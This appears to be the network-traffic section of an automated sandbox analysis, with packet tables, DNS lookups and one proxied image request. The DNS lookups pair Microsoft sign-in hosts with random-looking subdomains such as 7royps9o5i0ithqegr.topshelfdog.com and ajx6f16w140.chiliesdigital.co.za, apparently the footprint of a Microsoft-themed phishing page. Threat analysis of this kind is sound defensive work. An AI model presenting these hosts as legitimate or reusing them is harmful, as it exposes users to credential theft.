Dec 17, 2024 19:57:35.331494093 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.331526995 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.331593037 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.331849098 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.331861019 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:36.548573971 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:36.548908949 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:36.548939943 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:36.549746990 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:36.550137997 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:36.550223112 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:36.550328016 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:36.591407061 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:37.167937040 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:37.168338060 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:37.168397903 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:37.169034958 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:37.169555902 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:37.169651031 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:37.169677973 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:37.169720888 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:37.211116076 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:37.564977884 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:37.565211058 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:37.565593004 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:37.566524029 CET	49776	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:37.566546917 CET	443	49776	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:37.693684101 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:37.693917036 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:37.694097996 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:37.694922924 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:37.694984913 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:49.848377943 CET	49738	443	192.168.2.4	74.120.190.204
Dec 17, 2024 19:57:49.848434925 CET	443	49738	74.120.190.204	192.168.2.4
Dec 17, 2024 19:57:56.895188093 CET	49744	8443	192.168.2.4	104.21.37.147
Dec 17, 2024 19:57:57.014863014 CET	8443	49744	104.21.37.147	192.168.2.4
Dec 17, 2024 19:57:59.442363024 CET	49724	80	192.168.2.4	2.20.68.201
Dec 17, 2024 19:57:59.564013004 CET	80	49724	2.20.68.201	192.168.2.4
Dec 17, 2024 19:57:59.564176083 CET	49724	80	192.168.2.4	2.20.68.201
Dec 17, 2024 19:58:05.005861998 CET	49738	443	192.168.2.4	74.120.190.204
Dec 17, 2024 19:58:05.006208897 CET	443	49738	74.120.190.204	192.168.2.4
Dec 17, 2024 19:58:05.006326914 CET	49738	443	192.168.2.4	74.120.190.204
Dec 17, 2024 19:58:05.006367922 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:05.006462097 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:05.006602049 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:05.006829023 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:05.006865978 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:06.725239992 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:06.725821018 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:06.725882053 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:06.727045059 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:06.727616072 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:06.727833033 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:06.770237923 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:16.422190905 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:16.422350883 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:16.422729969 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:17.054203987 CET	49815	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:58:17.054270983 CET	443	49815	142.250.181.132	192.168.2.4
Dec 17, 2024 19:58:42.020808935 CET	49744	8443	192.168.2.4	104.21.37.147
Dec 17, 2024 19:58:42.199496031 CET	8443	49744	104.21.37.147	192.168.2.4
Dec 17, 2024 19:59:05.057398081 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:05.057507038 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:05.057612896 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:05.057857037 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:05.057892084 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:06.762151003 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:06.762898922 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:06.762959957 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:06.763684034 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:06.764678001 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:06.764797926 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:06.817681074 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:16.459899902 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:16.459991932 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:16.460161924 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:17.054514885 CET	49947	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:59:17.054544926 CET	443	49947	142.250.181.132	192.168.2.4
Dec 17, 2024 19:59:27.208250999 CET	49744	8443	192.168.2.4	104.21.37.147
Dec 17, 2024 19:59:27.327990055 CET	8443	49744	104.21.37.147	192.168.2.4
Dec 17, 2024 20:00:12.333815098 CET	49744	8443	192.168.2.4	104.21.37.147
Dec 17, 2024 20:00:12.457000971 CET	8443	49744	104.21.37.147	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 19:57:02.112082958 CET	53210	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:02.112452984 CET	61747	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:02.148201942 CET	53	53776	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:02.162480116 CET	53	60762	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:02.249897957 CET	53	61747	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:02.251378059 CET	53	53210	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:04.297713041 CET	52826	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:04.297938108 CET	52869	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:04.436022997 CET	53	52869	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:04.437482119 CET	53	52826	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:04.899127960 CET	53	50221	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:04.954874039 CET	55783	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:04.955213070 CET	50549	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:05.093820095 CET	53	55783	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:05.094177961 CET	53	50549	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:09.143285990 CET	58872	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:09.143474102 CET	50709	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:09.421586037 CET	53	58872	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:09.424536943 CET	53	50709	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:11.042067051 CET	138	138	192.168.2.4	192.168.2.255
Dec 17, 2024 19:57:11.508769989 CET	50039	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:11.509013891 CET	49990	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:11.509654045 CET	56420	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:11.509835958 CET	57927	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:11.646853924 CET	53	57927	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:11.647025108 CET	53	56420	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:11.798254967 CET	53	49990	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:11.798417091 CET	53	50039	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:11.892630100 CET	57250	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:11.892818928 CET	64717	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:11.893345118 CET	54791	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:11.893552065 CET	51975	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:12.031033993 CET	53	57250	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:12.031480074 CET	53	64717	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:12.319720984 CET	53	54791	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:12.331322908 CET	53	51975	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:14.351927996 CET	58840	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:14.352067947 CET	50030	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:14.473052025 CET	53	53616	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:14.481961966 CET	53	65342	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:14.488823891 CET	53	58840	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:14.490745068 CET	53	50030	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:21.758162975 CET	55049	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:21.758421898 CET	60830	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:22.075051069 CET	53	51296	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:22.521349907 CET	53	60830	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:22.521388054 CET	53	55049	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:26.073601007 CET	58783	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:26.073754072 CET	64455	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:26.213829041 CET	53	58783	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:26.213840961 CET	53	64455	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:27.080452919 CET	56638	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:27.080600023 CET	61041	53	192.168.2.4	1.1.1.1
Dec 17, 2024 19:57:27.217411995 CET	53	56638	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:27.222564936 CET	53	61041	1.1.1.1	192.168.2.4
Dec 17, 2024 19:57:40.972742081 CET	53	55547	1.1.1.1	192.168.2.4
Dec 17, 2024 19:58:00.803888083 CET	53	60269	1.1.1.1	192.168.2.4
Dec 17, 2024 19:58:03.427966118 CET	53	53946	1.1.1.1	192.168.2.4
Dec 17, 2024 19:58:33.629852057 CET	53	50585	1.1.1.1	192.168.2.4
Dec 17, 2024 19:59:18.572452068 CET	53	63988	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 19:57:02.112082958 CET	192.168.2.4	1.1.1.1	0x96ac	Standard query (0)	static.wikia.nocookie.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:02.112452984 CET	192.168.2.4	1.1.1.1	0x4f18	Standard query (0)	static.wikia.nocookie.net	65	IN (0x0001)	false
Dec 17, 2024 19:57:04.297713041 CET	192.168.2.4	1.1.1.1	0xd8ad	Standard query (0)	static.wikia.nocookie.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:04.297938108 CET	192.168.2.4	1.1.1.1	0x9219	Standard query (0)	static.wikia.nocookie.net	65	IN (0x0001)	false
Dec 17, 2024 19:57:04.954874039 CET	192.168.2.4	1.1.1.1	0xed60	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:04.955213070 CET	192.168.2.4	1.1.1.1	0xc231	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 17, 2024 19:57:09.143285990 CET	192.168.2.4	1.1.1.1	0xb0ad	Standard query (0)	7royps9o5i0ithqegr.topshelfdog.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:09.143474102 CET	192.168.2.4	1.1.1.1	0xf2cc	Standard query (0)	_8443._https.7royps9o5i0ithqegr.topshelfdog.com	65	IN (0x0001)	false
Dec 17, 2024 19:57:11.508769989 CET	192.168.2.4	1.1.1.1	0x6e1b	Standard query (0)	www.w3schools.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:11.509013891 CET	192.168.2.4	1.1.1.1	0x5511	Standard query (0)	www.w3schools.com	65	IN (0x0001)	false
Dec 17, 2024 19:57:11.509654045 CET	192.168.2.4	1.1.1.1	0xfcb4	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:11.509835958 CET	192.168.2.4	1.1.1.1	0x6614	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Dec 17, 2024 19:57:11.892630100 CET	192.168.2.4	1.1.1.1	0x3fc	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:11.892818928 CET	192.168.2.4	1.1.1.1	0x5b8b	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Dec 17, 2024 19:57:11.893345118 CET	192.168.2.4	1.1.1.1	0x502b	Standard query (0)	kasumbo.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:11.893552065 CET	192.168.2.4	1.1.1.1	0x1c8f	Standard query (0)	kasumbo.com	65	IN (0x0001)	false
Dec 17, 2024 19:57:14.351927996 CET	192.168.2.4	1.1.1.1	0x1162	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:14.352067947 CET	192.168.2.4	1.1.1.1	0xbfe9	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Dec 17, 2024 19:57:21.758162975 CET	192.168.2.4	1.1.1.1	0x7067	Standard query (0)	ajx6f16w140.chiliesdigital.co.za	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:21.758421898 CET	192.168.2.4	1.1.1.1	0x73b2	Standard query (0)	ajx6f16w140.chiliesdigital.co.za	65	IN (0x0001)	false
Dec 17, 2024 19:57:26.073601007 CET	192.168.2.4	1.1.1.1	0xfbe4	Standard query (0)	ajx6f16w140.chiliesdigital.co.za	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:26.073754072 CET	192.168.2.4	1.1.1.1	0xa124	Standard query (0)	ajx6f16w140.chiliesdigital.co.za	65	IN (0x0001)	false
Dec 17, 2024 19:57:27.080452919 CET	192.168.2.4	1.1.1.1	0xceb4	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.080600023 CET	192.168.2.4	1.1.1.1	0x7a49	Standard query (0)	outlook.office365.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 19:57:02.249897957 CET	1.1.1.1	192.168.2.4	0x4f18	No error (0)	static.wikia.nocookie.net	wikia.nocookie.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:02.251378059 CET	1.1.1.1	192.168.2.4	0x96ac	No error (0)	static.wikia.nocookie.net	wikia.nocookie.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:02.251378059 CET	1.1.1.1	192.168.2.4	0x96ac	No error (0)	wikia.nocookie.net		74.120.190.204	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:02.251378059 CET	1.1.1.1	192.168.2.4	0x96ac	No error (0)	wikia.nocookie.net		74.120.190.194	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:04.436022997 CET	1.1.1.1	192.168.2.4	0x9219	No error (0)	static.wikia.nocookie.net	wikia.nocookie.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:04.437482119 CET	1.1.1.1	192.168.2.4	0xd8ad	No error (0)	static.wikia.nocookie.net	wikia.nocookie.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:04.437482119 CET	1.1.1.1	192.168.2.4	0xd8ad	No error (0)	wikia.nocookie.net		74.120.190.204	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:04.437482119 CET	1.1.1.1	192.168.2.4	0xd8ad	No error (0)	wikia.nocookie.net		74.120.190.194	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:05.093820095 CET	1.1.1.1	192.168.2.4	0xed60	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:05.094177961 CET	1.1.1.1	192.168.2.4	0xc231	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 17, 2024 19:57:09.421586037 CET	1.1.1.1	192.168.2.4	0xb0ad	No error (0)	7royps9o5i0ithqegr.topshelfdog.com		104.21.37.147	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:09.421586037 CET	1.1.1.1	192.168.2.4	0xb0ad	No error (0)	7royps9o5i0ithqegr.topshelfdog.com		172.67.209.111	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:09.424536943 CET	1.1.1.1	192.168.2.4	0xf2cc	No error (0)	_8443._https.7royps9o5i0ithqegr.topshelfdog.com			65	IN (0x0001)	false
Dec 17, 2024 19:57:11.646853924 CET	1.1.1.1	192.168.2.4	0x6614	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Dec 17, 2024 19:57:11.647025108 CET	1.1.1.1	192.168.2.4	0xfcb4	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:11.647025108 CET	1.1.1.1	192.168.2.4	0xfcb4	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:11.798254967 CET	1.1.1.1	192.168.2.4	0x5511	No error (0)	www.w3schools.com	cs837.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:11.798417091 CET	1.1.1.1	192.168.2.4	0x6e1b	No error (0)	www.w3schools.com	cs837.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:11.798417091 CET	1.1.1.1	192.168.2.4	0x6e1b	No error (0)	cs837.wac.edgecastcdn.net		192.229.133.221	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:12.031033993 CET	1.1.1.1	192.168.2.4	0x3fc	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:12.031033993 CET	1.1.1.1	192.168.2.4	0x3fc	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:12.031033993 CET	1.1.1.1	192.168.2.4	0x3fc	No error (0)	sni1gl.wpc.omegacdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:12.031480074 CET	1.1.1.1	192.168.2.4	0x5b8b	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:12.031480074 CET	1.1.1.1	192.168.2.4	0x5b8b	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:12.319720984 CET	1.1.1.1	192.168.2.4	0x502b	No error (0)	kasumbo.com		108.178.43.142	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:14.488823891 CET	1.1.1.1	192.168.2.4	0x1162	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:14.488823891 CET	1.1.1.1	192.168.2.4	0x1162	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:14.488823891 CET	1.1.1.1	192.168.2.4	0x1162	No error (0)	sni1gl.wpc.omegacdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:14.490745068 CET	1.1.1.1	192.168.2.4	0xbfe9	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:14.490745068 CET	1.1.1.1	192.168.2.4	0xbfe9	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:22.521349907 CET	1.1.1.1	192.168.2.4	0x73b2	No error (0)	ajx6f16w140.chiliesdigital.co.za			65	IN (0x0001)	false
Dec 17, 2024 19:57:22.521388054 CET	1.1.1.1	192.168.2.4	0x7067	No error (0)	ajx6f16w140.chiliesdigital.co.za		104.21.81.229	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:22.521388054 CET	1.1.1.1	192.168.2.4	0x7067	No error (0)	ajx6f16w140.chiliesdigital.co.za		172.67.165.105	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:26.213829041 CET	1.1.1.1	192.168.2.4	0xfbe4	No error (0)	ajx6f16w140.chiliesdigital.co.za		104.21.81.229	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:26.213829041 CET	1.1.1.1	192.168.2.4	0xfbe4	No error (0)	ajx6f16w140.chiliesdigital.co.za		172.67.165.105	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:26.213840961 CET	1.1.1.1	192.168.2.4	0xa124	No error (0)	ajx6f16w140.chiliesdigital.co.za			65	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	outlook.office365.com	ooc-g2.tm-4.office.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		52.98.95.210	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		40.99.68.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		40.99.70.178	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		40.99.32.114	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		40.99.70.210	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		40.99.60.2	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		52.98.61.50	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.217411995 CET	1.1.1.1	192.168.2.4	0xceb4	No error (0)	ooc-g2.tm-4.office.com		52.98.61.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 19:57:27.222564936 CET	1.1.1.1	192.168.2.4	0x7a49	No error (0)	outlook.office365.com	ooc-g2.tm-4.office.com		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

static.wikia.nocookie.net

https:

cdnjs.cloudflare.com

www.w3schools.com

kasumbo.com

aadcdn.msftauth.net

ajx6f16w140.chiliesdigital.co.za

outlook.office365.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	74.120.190.204	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:03 UTC	628	OUT	GET /logopedia/images/7/7f/Microsoft_365_Admin.png/revision/latest?cb=20241113153458 HTTP/1.1 Host: static.wikia.nocookie.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:04 UTC	1180	IN	HTTP/1.1 200 OK date: Fri, 06 Dec 2024 12:57:06 GMT surrogate-key: 3b19dea483cbdd142eadf86b0915dda773c61260 wiki-logopedia thumblr original v:production-20241003125710-10-g0bce454b content-disposition: inline; filename="Microsoft_365_Admin.webp"; filename=UTF-8''Microsoft_365_Admin.webp content-type: image/webp etag: "BWcXMIylC02hQkWXY8vkHw==" x-thumbnailer: Thumblr access-control-allow-origin: access-control-allow-headers: Range content-security-policy: default-src 'none'; script-src 'none'; img-src 'self'; media-src 'self'; style-src 'unsafe-inline'; sandbox; report-uri https://services.fandom.com/csp-logger/csp/thumblr cache-control: public, max-age=31536000 nel: {"report_to":"nel","max_age":604800,"failure_fraction":0.01} report-to: {"group":"nel","endpoints":[{"url":"https://services.fandom.com/browser-errors/report"}],"max_age":604800,"include_subdomains":true} content-length: 18290 x-envoy-upstream-service-time: 174 server: envoy x-cacheable: YES age: 971997 accept-ranges: bytes vary: Accept x-cache: ORIGIN, HIT timing-allow-origin: * x-served-by: thumblr-799b89698-nmmws, wk-cdn-s12 x-cache-hits: ORIGIN, 12 connection: close
2024-12-17 18:57:04 UTC	10399	IN	Data Raw: 52 49 46 46 6a 47 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 f3 01 00 f3 01 00 41 4c 50 48 67 0f 00 00 01 14 c5 6d db 46 d6 fe 7b e7 4e da 67 44 4c 80 7e 30 79 a1 79 f4 03 c6 53 92 ac 31 2a d5 13 b7 ef 23 7a e0 ff 7f 91 d3 6c db 7e 33 b3 9b b5 24 10 22 68 94 a0 21 b8 bb 6b 0d ab 10 8a 43 52 8e 03 97 3a ee 5a 0f 0e 07 5a c5 8f 02 85 f0 6a 71 1a 0f 1e 81 46 b0 b8 ad cf cc ff 38 8e 13 09 bb 33 f3 fb cf 69 89 88 09 80 53 db b6 6b e5 8b f8 9f 20 80 0e 03 08 40 04 02 a8 a8 d2 0d 2f e7 f7 7a a2 36 1c e0 02 0b f3 8d df 44 44 40 b5 ff ab fd 5f ed ff 6a ff 57 fb bf da ff d5 fe af f6 7f b5 d4 0d 2d c7 7d b2 74 ee 20 5f 59 e2 ea 0c 9c bb ec d3 71 91 7a ca a6 69 f1 c9 3f 6f e6 e4 17 3e c9 b8 be ad 87 4e 6e f4 dd 63 13 32 9e 14 e6 e7 dc 3c 31 ab b1 86 9e f9 Data Ascii: RIFFjGWEBPVP8XALPHgmF{NgDL~0yyS1*#zl~3$"h!kCR:ZZjqF83iSk @/z6DD@_jW-}t _Yqzi?o>Nnc2<1
